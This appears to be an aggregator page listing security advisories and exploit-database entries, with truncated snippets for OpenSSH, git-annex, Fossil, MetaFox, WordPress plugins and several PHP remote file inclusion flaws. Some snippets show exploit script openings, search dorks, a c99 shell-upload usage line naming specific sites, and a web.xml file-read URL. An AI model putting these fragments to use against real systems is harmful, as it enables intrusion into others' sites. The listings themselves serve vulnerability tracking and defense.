RockyLinux 9 : openssh (RLSA-2025:23480)

The remote RockyLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RLSA-2025:23480 advisory. openssh: OpenSSH: Control characters in usernames can lead to code execution via ProxyCommand CVE-2025-61984 openssh: OpenSSH: Null character in ssh://...

CLSA-2026-1767627828 openssh: Fix of CVE-2025-61985

CVE-2025-61985: potential code execution using the ‘\0’ character in an ssh:// URI, when a ProxyCommand is used...

Linux Distros Unpatched Vulnerability : CVE-2017-12976

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - git-annex before 6.20170818 allows remote attackers to execute arbitrary commands via an ssh URL with an initial dash character in the hostname, as demonstrated...

MetaFox 5.1.8 Shell Upload

!/usr/bin/env python3 Exploit Title: MetaFox Remote Shell Upload Google Dork: "Social network for niche communities" Exploit Author: The Joker Vendor Homepage: https://www.phpfox.com Version: = 5.1.8import jsonimport requestsimport sysif lensys.argv != 4: sys.exit"Usage: %s " % sys.argv0...

Exploit for Code Injection in Vmware Spring_Framework

Spring4Shell - CVE-2022-22965 Build - let's clone the repo...

WordPress Smart Product Review 1.0.4 Shell Upload

Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload Google Dork: inurl: /wp-content/plugins/smart-product-review/ Date: 16/11/2021 Exploit Author: Keyvan Hardani Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/ Version: = 1.0.4...

Billing System Project 1.0 - Remote Code Execution (Unauthenticated) Exploit

Exploit Title: Billing System Project 1.0 - Remote Code Execution RCE Unauthenticated Exploit Author: Talha DEMİRSOY Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html Version: V 1.0 Tested on: Linux & Windows import requests import...

Fossil Arbitrary Command Execution Vulnerability

Fossil is a simple, reliable distributed software configuration management system. An arbitrary command execution vulnerability exists in httptransport.c in Fossil before 2.4. A user-assisted remote attacker can exploit this vulnerability to execute arbitrary commands via an ssh URL with an initi...

GitLab Arbitrary Code Execution Vulnerability

GitLab is a set of open source applications developed using Ruby on Rails to implement a self-hosted Git version control system project repository, which has features similar to Github, with access to a project's file contents, commit history, bug list, etc. GitLab Community Edition CE is the...

Alibaba Clone B2B Marketplace Script Shell Upload Vulnerability

Alibaba Clone B2B Marketplace Script Shell Upload Vulnerability All Versions Usage Info Usage:alibaba.php host shell-file.php Ex:alibaba.php www.example.com c99.php Test : php alibaba.php tibastore.com c99.php php alibaba.php hechoenmexicob2b.com c99.php $val $data .= "--$boundary\n"; $data .=...

Content Builder 0.7.5 postComment.php Remote File Include Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the...

BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability

No description provided by source. ============================================================================================== BrudaGB = v1.1 o Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangero...

Popper <= 1.41-r2 - (form) Remote File Include Vulnerability

No description provided by source. ============================================================================================== Popper = v1.41 form Remote File Inclusion Exploit =============================================================================================== Critical Level :...

KINGOSOFT高校网络教学平台一系列严重问题

简要描述： KINGOSOFT高校网络教学平台一系列严重问题 详细说明： KINGOSOFT高校网络教学平台是青果软件的另一产品，发现有严重的安全隐患。 1.文件读取漏洞 这个系统是J2EE开发，我们来访问（实际测试地址不方便放出，因为是学校） http://test.com/testpath/download.jsp?downfile=WEB-INF/web.xml 得到  CASFilter edu.yale.its.tp.cas.client.filter.CASFilter edu.yale.its.tp.cas.client.filter.loginUrl...

Free Simple Software v1.0 Remote File Inclusion Vulnerability

Exploit for php platform in category web applications ============================================================= Free Simple Software v1.0 Remote File Inclusion Vulnerability ============================================================= Free Simple Software V1.0 By : Dr.$audi SauDi ViRuS TeaM ...

Free Simple Software 1.0 - Remote File Inclusion

Free Simple Software 1.0 - Remote File Inclusion Free Simple Software V1.0 By : Dr.$audi SauDi ViRuS TeaM By : http://Sa-ViRuS.CoM Email : [email protected] Dork: Powered by free simple software Greets : RENO , Dr.php , ! BaD BoY ! , Gov.HaCkEr , Mind , AnTi SeCuRe Script HomePage:...

PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution

Date: 02/07/08 Note I modified a bit phpsploit for this exploit, because PHP Nuke plays with REQUESTURI var ... Requirements registerglobals=On phpreter phpreter is really easy to use: You can change mode using "mode=", with = sql, php or cmd If you want to understand how it work ... read the cod...

Content Builder 0.7.5 - postComment.php Remote File Inclusion

Content Builder 0.7.5 - postComment.php Remote File Inclusion source: https://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to...

Content Builder 0.7.5 - &#039;postComment.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/25914/info ContentBuilder CB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks a...

Dalai Forum Remote File Inclusion Exploit

============================================================================================== Dalai Forum Remote File Inclusion Exploit =============================================================================================== DORK : "Dalai Forum"...